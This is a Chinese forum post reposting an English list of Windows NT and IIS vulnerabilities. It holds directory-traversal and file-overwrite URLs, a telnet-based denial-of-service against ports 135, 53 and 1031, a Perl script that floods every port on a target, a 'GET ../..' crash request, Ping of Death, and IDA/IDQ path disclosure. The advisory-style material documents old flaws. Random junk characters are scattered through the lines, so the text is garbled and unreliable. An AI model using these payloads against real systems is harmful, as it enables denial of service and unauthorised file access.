找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.01 @, b% O0 J% m9 r8 [
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.9 t+ F) j1 O- o" c/ b

8 M; X3 v8 G, o' ]A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
% t6 z; K* I: g$ P
) R: d. F0 \( B1 i2 c  PBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.2 d0 a/ b3 d& ^& G3 [

. H% x6 z+ y% K8 s--------------------------------------------------------------------
. J! n# N- x3 x1 b. l2 d
% G5 D" q) t9 T; D受影响系统:4.07 a% K$ @% ], ?  L
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
5 a0 w# ~+ V1 K) x7 P
; m& U; ~# I- x4 g0 }, `If the file 'target.bat' exists, the file will be truncated.* t3 \) j+ ]" N  ]) ?
, Y+ j# U6 x2 K; `8 D
8 ^/ z2 c8 W; P" H) q
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
0 V, q; F4 Q9 L6 w5 B$ b2 A3 k3 @7 {. n! T; j) u( D
----------------------------------------------------------------------
; ]7 F( A; D% c# I0 O7 u7 O! w; _
+ k" z- n5 _( X# k) z受影响系统:3.51,4.0% c5 q" ?  Z! h1 h
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
# o' j' |; D8 o  s% @8 {+ e5 W9 P; Q) E2 b, @7 T# J: r
The following steps;
5 W" u& m, l5 c% d: A
  ]8 {- Y) p- }Telnet to an NT 4.0 system on port 135
. n9 ]$ I& U0 Q6 n2 zType about 10 characters followed by a <CR> , v4 H  I1 {) [8 ?$ Y1 a
Exit Telnet $ Q5 s; F! o7 x: B
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.% q) ~& h4 q- Q+ t+ Z

+ l# x8 }9 o' T* z+ ]When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
7 ~# }0 m& p# X
! s9 E2 b1 e5 ~8 ^& _The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
: |0 ]7 H3 K$ ~4 e8 v  T2 F
" r3 y4 F3 `$ f6 ~If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.5 c# D7 i5 a: X8 C! b
- }/ F$ K1 }  @# j
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
. g% p" `) d3 M
7 h2 e8 p. N! G9 S6 ~/*begin poke code*/
% R# x, p1 a! A% K2 {( u( F# A) A; @. d( R
use Socket;
/ b' {. a# {/ D5 iuse FileHandle;
/ r: H7 p: j2 ?) p* Yrequire "chat2.pl";
" r! p: u! X2 U' X5 K  f" H: T6 T! n: w& A0 D2 [) f( u
$systemname = $ARGV[0] && shift;
& n6 A4 c7 h9 j3 @5 H& l3 f- \* V2 c, K% F) O; q3 J
$verbose = 1; # tell me what you're hitting
& w+ \+ K, K  \% L$ j9 ?7 B$knownports = 1; # don't hit known problem ports0 W1 T5 I% D6 W4 u( C/ @2 d. a
for ($port = $0; $port<65535; $port++) 1 u; D* [3 O" w; x. o4 b$ {
{$ n, Z/ ~6 @$ S0 w: f  J

9 q: ~5 W# J1 c9 S: C+ z9 G$ F
! K0 W. n. ], [0 w; \if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {0 U" V+ J9 k1 N4 C' Z! @
next;
; S1 ]4 |/ L5 Q# ^7 b& Y. ?6 n( n}
% o4 a6 u# g) i. R3 W3 j) h' d, x3 z; P$fh = chat::open_port($systemname, $port);
- ?4 l' P4 g& M# I% rchat::print ($fh,"This is about ten characters or more");
# z8 ^3 Z# s! J; \if ($verbose) {# D" {1 [6 f1 u9 X5 u1 J; L0 l7 c
print "Trying port: $port\n";
9 s% X! K9 V/ ?( P* H: o} " U! q8 P* S  z% [2 m6 j5 U# k7 v
chat::close($fh);
* S4 i3 b! [7 h9 Y+ A
6 a: G7 [) Q. Q; S5 X2 X}
% a1 }7 M/ a$ R
1 X+ t2 j+ X9 T* v& U  S7 }; S* v% W/ r0 L& Q  V; _+ |
/*end poke code*/
( D1 ?0 i' t4 ?9 K! ?+ r. k- D2 Y) _# U2 T
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername: S; _1 T6 q- C) }% D

7 a9 i$ N2 p3 [--------------------------------------------------------------------------------
  \, J" f& x" i' G6 J! A; A! x7 r2 c3 j( _) K9 y  k  B
受影响系统:4.0
1 K, g# K4 ^7 ^; a9 V6 XUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
2 d3 L4 j& C* l( S" u* ?" ]" U. }5 V; j: f  u- _/ O
This attack causes Dr. Watson to display an alert window and to log an error: " J4 C3 o: ~8 s7 D6 d+ N; i

2 W' f. Y9 V( ]' D  W  J8 R"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
# B7 S- i5 f6 q2 m+ c  n0 ^. _# {0 ~% I  @- V3 X6 {
--------------------------------------------------------------------------------* H( f/ n- i; z! P
4 i+ i- G0 j. w
受影响系统:3.51,4.0
7 I% H: t! v) VLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
  t/ F- j" n$ T6 E: n! K; a' K- j
) ?9 |$ e' D% J9 [0 g& E2 \STOP: 0X0000001E
5 g! h$ J" J6 \# O% N2 R: FKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
! a. V  O6 c6 |0 B& w+ y4 Y4 X$ W6 P- Z( g' r* {
-OR-
& ~& E) \7 t9 E( M
2 V9 A/ P$ b4 Q# X# b$ _STOP: 0x0000000A
5 c* [4 Y7 J, X* DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS% O3 I: n+ l0 {  z

& @/ J- S: {- r) z# hNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.* X. l+ k2 ]% [' v+ F- i; R
6 ^$ `! H/ \3 f) i+ C, K( y  h' I+ M
--------------------------------------------------------------------------------
( ^3 O7 s/ w! q+ p2 h4 K8 E% b6 V. f! i* O) z* h4 z
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 1 y# f. o" F: s2 q

9 R. i! \4 T' `--------------------------------------------------------; f5 n3 N6 [& e% f
$ n# W) y! m8 w' K
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-8-2 14:45

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表